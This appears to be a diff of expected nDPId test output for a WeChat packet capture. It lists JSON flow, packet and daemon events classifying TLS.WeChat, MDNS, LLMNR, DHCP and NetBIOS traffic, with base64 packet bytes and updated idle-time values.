+00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1497,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1492167720353,"flow_last_seen":1492167748129,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1492167872304,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1492167765433,"flow_last_seen":1492167776953,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9786,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":1492167897092,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167905310,"flow_last_seen":1492167905310,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167905310,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1492167905310,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167905310,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8Y7pAAEAGtXnAqAFny82Tq+K6AbsLFrb3AAAAAKACchA4ZAAAAgQFtAQCCAoAMtVNAAAAAAEDAwc="} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1514,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167905561,"flow_last_seen":1492167905561,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167905561,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58043,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1514,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1492167905561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167905561,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8gtZAAEAGll3AqAFny82Tq+K7AbsB+ldaAAAAAKACchCg3QAAAgQFtAQCCAoAMtWMAAAAAAEDAwc="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1515,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1492167905585,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167905585,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rpcdpBKCxa2+KASN8jmJgAAAgQFoAQCCApFr1oYADLVTQEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1516,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1492167905585,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167905585,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0Y7tAAEAGtYDAqAFny82Tq+K6AbsLFrb4XHaQS4AQAOVLfQAAAQEICgAy1ZJFr1oY"} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1517,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167905310,"flow_last_seen":1492167905586,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167905586,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1518,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1492167905858,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167905858,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rtG\/8zAAfpXW6ASN8gnXAAAAgQFoAQCCApFr1pdADLVjAEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1519,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":3,"flow_last_seen":1492167905858,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167905858,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0gtdAAEAGlmTAqAFny82Tq+K7AbsB+ldbRv\/MwYAQAOWMrQAAAQEICgAy1dZFr1pd"} +00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1521,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167905310,"flow_last_seen":1492167905866,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167905866,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1523,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167905310,"flow_last_seen":1492167905866,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167905866,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1550,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167765657,"flow_last_seen":1492167777220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167911211,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58037,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1550,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167765657,"flow_last_seen":1492167777220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167911211,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58037,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00565{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","packets-captured":1553,"packets-processed":1552,"total-skipped-flows":0,"total-l4-data-len":556502,"total-not-detected-flows":0,"total-guessed-flows":15,"total-detected-flows":58,"total-detection-updates":63,"total-updates":4,"current-active-flows":30,"total-active-flows":76,"total-idle-flows":46,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":467,"global_ts_msec":1492171154216} -00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171154216,"flow_last_seen":1492171154216,"flow_idle_time":7440000,"flow_min_l4_payload_len":1188,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":1188,"flow_avg_l4_payload_len":1188,"midstream":1,"thread_ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54183,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -02086{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1492171154216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1254,"pkt_l4_len":1220,"thread_ts_msec":1492171154216,"pkt":"8IQvSpdgeJKcD6iOCABFAATYpoxAAEAGahTAqAFny82XotOnAbtQhl2xjWp\/PoAYBaSJeAAAAQEICgA\/OhBF4BL0FwMDBJ8AAAAAAAAAk06IK7tTPaQ0tnXGeqHKil75lMj6OyIERVlvQ89pkJ\/5uFrYubJHeJqSrynvitkot5qunWtMUvVbyI8vjd8zycM9IsUAAB\/fKHCxwAngzbmC6gdk\/UoKTL4MIPiK4NVVPRz1DsYhuoql6sqmFMKJKaM6NXpyBkCtYpvlazDCWxllWCP\/i12XdKQQMbcGYN2wvAB3a6vg6oJPIx+XXkk4cY\/+EENsi+PDerl+pB2IlJMObTfaJBhM\/rJFUKMd1xriphMBzgM9PCE+gKKP\/k+AYg8NddY\/gnJX\/+unfAflhC1NZ1nFt2\/\/Y9gesYC0uhG0uLLlbtLmKF2MPjllgxHAEeq6L2rXw2szIJL4yllp+t9tcKCYfzVRzCQkgUtQQaP0YiRh1NQtDTvnuPpM8CS6YfFOx17PkSNzepokWNsrLXMtr9p2nc9zczirZ\/D9H9Xey3Xx0qFAN\/MVzWUXfWpSlTWrXzNWP5kDdvTYBf19VGMPfxtzLKYTLOd\/rVswJ6OAUsAdfTYAu7j6c4KJubGecouom8T9brd1TJm6pyXignKkiQR+nvp0U\/G\/NxhEcnKV91SvFM0mQxh+hfK10svoh9dj1Bq8+PvXaAQljscptiwRlr+X\/V1zPyapTZcrW9A2fGrnzKqVYJASiCPQWyYD8Mn6pda0e6knRW3Ae28WpLnmyjMKx4\/7dOqugSoKa3q7BQRxbcpbcOXlPFfrjt+CwbA3KCTzFvdocE4QeSDn8FuJ85HFummmQOxK7tDtjljV+L\/2nbiMgjTy6jJzYFwXGw6xLdoXOupF5XjIfHUSMeB+R0BhUmtVxXEWPPHfAVdVJcBt8uO5QMhp9jxrSrOX54VXB+P7Qj0VmSag75Jhz20k8Z3uI27cFcp7OjdlKhlEBtlzESNSQ8FGkqCxygPJSf0REdvr2uQA0ApTgzzF+s6YbdeH3vy1SJOH2fQsH4IeYeRjAPrh1RmlhN066XBLLeGtIiz1LEJx17TCB8c1JpUan\/1+JYoV0SCzXlaZWYybCxcBBIz\/2EdpG8hJzN4rtTVwf\/3OYFkhRTMbe1PHW9T5IfuTuKU76wWlDp+aujzjWp1vvFdq4bUrI6AdEquAU5C3BTnuLB9tqzlOb5nzcQjb4fPQCkUUcvHBPPLW9qrLyB05aTRG1W9ShnsibG\/AerW39YgPMVulkynnwtbGsYcGZs7KelCQXCLt3D6RU08N5SulLgw+o5aYItue0wJaW5VDEXxAVhsE4KU4+QsEuXkbd9rTsMt9Gf+Td49H8NzJEXxlYX\/ThtsZsn5doQpcdUcGVMiJrwpHQzTDWZLiBcd51axsLca9fP61xaeKb48j0Kb0TeXy0DcAfEDH4Sy29YAuNi7N4uKdxMrzHsqaQhCFI\/jmx6CqCWjy1zA6Ijzjpx6KTEeNxn3m7OTzuxckZQeS0ArKR7BX7UnCFIAenlvKt7e\/DzO9W1DndidXP+Qwf3XzvB+qvenTl6HWA0XtGBky3MCwBE5b++HXnyFlygjOvbY7LPZovuQtASvUqwAHPkuONuar\/2ZEP2TwCB+AOJYrpZq+HLOc"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1554,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171154792,"flow_last_seen":1492171154792,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":54205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1554,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1492171154792,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171154792,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0MxpAAEAGXPXAqAFnQOmnvNO9AbuA1BLzAh8CfoAQAT0MFQAAAQEICgA\/OqCGKY\/Q"} +00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171154216,"flow_last_seen":1492171154216,"flow_idle_time":7560000,"flow_min_l4_payload_len":1188,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":1188,"flow_avg_l4_payload_len":1188,"midstream":1,"thread_ts_msec":1492171154216,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54183,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +02086{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1553,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1492171154216,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1254,"pkt_l4_len":1220,"thread_ts_msec":1492171154216,"pkt":"8IQvSpdgeJKcD6iOCABFAATYpoxAAEAGahTAqAFny82XotOnAbtQhl2xjWp\/PoAYBaSJeAAAAQEICgA\/OhBF4BL0FwMDBJ8AAAAAAAAAk06IK7tTPaQ0tnXGeqHKil75lMj6OyIERVlvQ89pkJ\/5uFrYubJHeJqSrynvitkot5qunWtMUvVbyI8vjd8zycM9IsUAAB\/fKHCxwAngzbmC6gdk\/UoKTL4MIPiK4NVVPRz1DsYhuoql6sqmFMKJKaM6NXpyBkCtYpvlazDCWxllWCP\/i12XdKQQMbcGYN2wvAB3a6vg6oJPIx+XXkk4cY\/+EENsi+PDerl+pB2IlJMObTfaJBhM\/rJFUKMd1xriphMBzgM9PCE+gKKP\/k+AYg8NddY\/gnJX\/+unfAflhC1NZ1nFt2\/\/Y9gesYC0uhG0uLLlbtLmKF2MPjllgxHAEeq6L2rXw2szIJL4yllp+t9tcKCYfzVRzCQkgUtQQaP0YiRh1NQtDTvnuPpM8CS6YfFOx17PkSNzepokWNsrLXMtr9p2nc9zczirZ\/D9H9Xey3Xx0qFAN\/MVzWUXfWpSlTWrXzNWP5kDdvTYBf19VGMPfxtzLKYTLOd\/rVswJ6OAUsAdfTYAu7j6c4KJubGecouom8T9brd1TJm6pyXignKkiQR+nvp0U\/G\/NxhEcnKV91SvFM0mQxh+hfK10svoh9dj1Bq8+PvXaAQljscptiwRlr+X\/V1zPyapTZcrW9A2fGrnzKqVYJASiCPQWyYD8Mn6pda0e6knRW3Ae28WpLnmyjMKx4\/7dOqugSoKa3q7BQRxbcpbcOXlPFfrjt+CwbA3KCTzFvdocE4QeSDn8FuJ85HFummmQOxK7tDtjljV+L\/2nbiMgjTy6jJzYFwXGw6xLdoXOupF5XjIfHUSMeB+R0BhUmtVxXEWPPHfAVdVJcBt8uO5QMhp9jxrSrOX54VXB+P7Qj0VmSag75Jhz20k8Z3uI27cFcp7OjdlKhlEBtlzESNSQ8FGkqCxygPJSf0REdvr2uQA0ApTgzzF+s6YbdeH3vy1SJOH2fQsH4IeYeRjAPrh1RmlhN066XBLLeGtIiz1LEJx17TCB8c1JpUan\/1+JYoV0SCzXlaZWYybCxcBBIz\/2EdpG8hJzN4rtTVwf\/3OYFkhRTMbe1PHW9T5IfuTuKU76wWlDp+aujzjWp1vvFdq4bUrI6AdEquAU5C3BTnuLB9tqzlOb5nzcQjb4fPQCkUUcvHBPPLW9qrLyB05aTRG1W9ShnsibG\/AerW39YgPMVulkynnwtbGsYcGZs7KelCQXCLt3D6RU08N5SulLgw+o5aYItue0wJaW5VDEXxAVhsE4KU4+QsEuXkbd9rTsMt9Gf+Td49H8NzJEXxlYX\/ThtsZsn5doQpcdUcGVMiJrwpHQzTDWZLiBcd51axsLca9fP61xaeKb48j0Kb0TeXy0DcAfEDH4Sy29YAuNi7N4uKdxMrzHsqaQhCFI\/jmx6CqCWjy1zA6Ijzjpx6KTEeNxn3m7OTzuxckZQeS0ArKR7BX7UnCFIAenlvKt7e\/DzO9W1DndidXP+Qwf3XzvB+qvenTl6HWA0XtGBky3MCwBE5b++HXnyFlygjOvbY7LPZovuQtASvUqwAHPkuONuar\/2ZEP2TwCB+AOJYrpZq+HLOc"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1554,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171154792,"flow_last_seen":1492171154792,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":54205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1554,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1492171154792,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171154792,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0MxpAAEAGXPXAqAFnQOmnvNO9AbuA1BLzAh8CfoAQAT0MFQAAAQEICgA\/OqCGKY\/Q"} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795095,"flow_last_seen":1492167795102,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50577,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167338426,"flow_last_seen":1492167781907,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167851002,"flow_last_seen":1492167851002,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} @@ -480,12 +480,12 @@ 00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1492167795292,"flow_last_seen":1492167796728,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167848542,"flow_last_seen":1492167848542,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167795092,"flow_last_seen":1492167795103,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":49195,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":1492167776953,"flow_last_seen":1492167815112,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":25818,"flow_avg_l4_payload_len":437,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1492167777204,"flow_last_seen":1492167918120,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58039,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1492167777204,"flow_last_seen":1492167918120,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492171154792,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58039,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 